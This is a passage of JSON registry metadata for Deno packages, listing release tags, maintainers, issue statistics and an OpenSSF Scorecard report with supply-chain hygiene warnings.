ies/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T14:04:53.900Z","dependent_packages_count":0,"downloads":464367,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":25.354594294144324,"dependent_packages_count":36.69686831981711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":31.025731306980717},"purl":"pkg:npm/%40deno/linux-x64-glibc","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@deno/linux-x64-glibc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@deno/linux-x64-glibc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@deno/linux-x64-glibc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@deno%2Flinux-x64-glibc/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T22:08:47.667Z","updated_at":"2024-12-12T22:08:47.667Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"divy-work","login":"divy-work","name":null,"email":"dj.srivastava23@gmail.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~divy-work","role":null,"created_at":"2024-12-12T22:08:48.055Z","updated_at":"2024-12-12T22:08:48.055Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/divy-work/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-12T22:08:48.128Z","updated_at":"2024-12-12T22:08:48.128Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"},{"uuid":"bartlomieju","login":"bartlomieju","name":null,"email":"biwanczuk@gmail.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~bartlomieju","role":null,"created_at":"2026-03-27T13:02:51.179Z","updated_at":"2026-03-27T13:02:51.179Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bartlomieju/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11644473,"name":"deno_npm_installer","ecosystem":"cargo","description":"Installer of npm packages used in Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":54,"first_release_published_at":"2025-05-15T20:12:28.542Z","latest_release_published_at":"2026-08-27T15:22:43.384Z","latest_release_number":"0.53.0","last_synced_at":"2026-08-29T21:56:48.210Z","created_at":"2025-05-15T20:15:15.390Z","updated_at":"2026-08-29T21:56:48.210Z","registry_url":"https://crates.io/crates/deno_npm_installer/","install_command":"cargo install deno_npm_installer","documentation_url":"https://docs.rs/deno_npm_installer/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction 